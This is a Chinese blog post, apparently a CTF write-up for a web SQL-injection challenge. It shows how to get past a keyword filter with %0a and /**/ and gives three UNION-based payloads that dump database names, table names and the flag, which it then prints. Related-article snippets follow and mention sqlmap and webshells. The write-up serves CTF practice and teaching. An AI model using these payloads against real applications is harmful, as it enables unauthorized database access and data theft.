[CTF]简单的sql注入之1

最新推荐文章于 2024-03-14 10:36:16 发布
最新推荐文章于 2024-03-14 10:36:16 发布
阅读量1.1k 收藏 5
点赞数 1
分类专栏: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/alex_bean/article/details/93754656
版权

类型:web
网址:http://www.shiyanbar.com/ctf/1875
攻击:sql注入
一句话总结:
id有回显的sql注入(手工)

Writeup:

Union、select等被过滤,使用union%0a、select%0a代替
或者%0a用/**/替代也可以。

爆数据库名称:

1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1

结果:baloteli、information_schema、test、web1

爆表:

1' union%0a select%0a table_name from%0a information_schema.tables%0a where%0a '1'='1

结果有很多,找到最后几张表,发现flag表

爆flag表flag字段的数据:

1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1

结果两条数据,分别是baloteli、flag{Y0u_@r3_5O_dAmn_90Od}

FLAG

flag{Y0u_@r3_5O_dAmn_90Od}

胖胖のALEX
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf小经验sql注入
04-11
sql注入一、找到注入点; 二、判断当前表的字段; 三、用联合语句查看哪几位是有效位; 四、查看当前数据库中有哪些表; 五、查看表中有哪些属性;
CTF入门之SQL注入
PolarPeak的博客
12-08 2084
一、字符型注入 <?php require_once('../header.php'); require_once('db.php'); $sql = "SELECT * FROM users where name = '"; $sql .= $_GET['name']."'"; $result = mysql_query($sql); if($result) { ?> <?php while ($row = mysql_fetch_assoc($result)){ echo
sql注入第一关
weixin_70464248的博客
01-30 1113
使用共享存储方式: 在共享存储方式下,负载均衡器会将webshell文件存储在共享存储设备上,而不是存储在后端服务器上。这样,无论请求被转发到哪台服务器,都可以访问到相同的webshell文件,实现了连接的共享和一致性。nginx解析漏洞是指由于nginx的配置问题,导致nginx将以'.php'结尾的文件交给fastcgi处理,从而可能导致恶意用户上传包含PHP代码的文件并执行。需要注意的是,负载均衡下的webshell连接可能会面临一些挑战,比如文件分片上传导致文件被拆分到不同的后端服务器上。
二、sql注入(CTF技巧)
最新发布
黑日里不灭的light
03-14 292
解释:在一些题目里面常常充满了各种各样的过滤,我们需要结合实际情况去进行注入,下面提供一些Payload以及适用场景。
sqlmap详解及实战拿flag
weixin_43996007的博客
12-19 4118
sqlmap详解及实战拿flag 一、sqlmap介绍 sqlmap是一个非常强大的自动化SQL注入工具,其主要功能是扫描,发现并利用SQL注入漏洞。sqlmap工具支持多种sql注入技术,它们分别是: 1)基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2)基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3)基于报...
利用sqlmap注入获取flag
weixin_43910033的博客
01-21 4331
准备注入网址:http://192.168.129.129:8079 (需要自己搭建) 注入点:id 1.注入语句: python sqlmap.py -u "http://192.168.129.129:8079/?id=1" 2.得到数据库是MySQL,进一步获取数据库信息。 python sqlmap.py -u "http://192.168.129.129:8079/?id=1" --dbs 3.得到可用的数据库,查询数据库里面的表以获取表信息 python sqlmap.py -u "
封神台SQL注入-显错注入
qq_40941912的博客
08-23 1409
一、原理 判断注入点 判断当前页面字段总数 判断显示位 查当前数据库 查表名 查列名 查字段内容 Mysql在5.0以上版本加入了 information_schema 这个系统自带库 其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等 information_schema.tables 存放表名和库名的对应 information_schema.columns 存放字段名和表名的对应 [注: information_schema.tables
SQL注入-1
ahu0076的博客
04-18 100
select * from table_name where id=1 select version() 显示数据库的版本信息 select * from table_name where id=1 order by 1; 猜表的列数 order by 后面从1开始依次猜解 union前后语句的列数必须相同 select * from table_name where id ...
SQL注入详解-1
weixin_33859844的博客
11-09 74
&lt; DOCTYPE html PUBLIC -WCDTD XHTML StrictEN httpwwwworgTRxhtmlDTDxhtml-strictdtd&gt; 随着B/S 模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性...
简单sql注入1
qq_36915061的博客
12-19 651
通过sql注入得到flag 题目:http://ctf5.shiyanbar.com/423/web 打开题目: 先随便输了些数字,发现只有1、2、3查询结果 接下来进行第一步测试 输入一个带单引号的数据,目的是测试是否存在注入点,输入1’发现报错,说明此处存在注入点。且后台代码应该是一般的seletc语句,可以通过开闭合单引号来进行注入。 输入1 and 1=1发现id后显示1 1=1说明存在...
CTF刷题总结(1)------简单SQL注入
qq_45047250的博客
04-25 1247
第一次写分享类的文章,有错误的地方还请大家多多指正哈!此篇文章主要分享一些刷web题目中会遇到的一些知识点,之后还会继续分享一些关于这方面的知识。 文章目录简单sql注入预备知识注入前判断如何判断注入顺序及操作总结 简单sql注入 预备知识 schema:可以代表数据库的组织和结构,其中schema和schemata的模式可以是表、列、数据类型、关系、主键等等。下面会通过例子来说明,大家可以自行体会。 information_schema: 是MySQL自带的信息数据库,用于存储数据库元数据(例如:数
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
sql注入攻击流量情况
07-18
sql注入攻击流量情况
CTFSQL注入常见题型整理.pdf
02-11
CTFSQL注入常见题型整理
SQL注入漏洞演示源代码
07-15
SQL注入漏洞演示源代码 更多免费资源请查看:http://download.csdn.net/user/php_fly
webug3.0第一关学习笔记
lxw826982262的博客
07-26 660
第一题:普通的GET注入 前言:这个注入前期有看过相关的教学视频,对sql注入有一些了解,在手工注入和工具注入中,原理都是修改参数,让数据库报错,是因为开发人员在编程时,对用户输入的参数没有做过滤,直接把错误参数注入到数据库执行,并返回我们想要的结果。 第一种方法:手工注入 1.打开题目页面 在“id=1”后面键入单引号根据错误信息判断此参数存在注入点并可判断出后台数据库为MySQL,错误信息如...
CTFer成长之路之CTF中的SQL注入
众生度尽,方证菩提
02-20 1382
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
CTF Web简单SQL注入
RED_散的博客
09-17 925
题目链接
sql注入学习(sqli-labs-master靶场第一关)
qq_64020439的博客
02-05 457
sql注入之Sqli-labs-master靶场学习第一关
ctfhub sql注入
10-09
CTFHub是一个CTF(Capture The Flag)竞赛平台,其中包含了各种类型的安全挑战,包括SQL注入SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以利用它来绕过应用程序的身份验证、访问未授权的数据或执行恶意操作...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值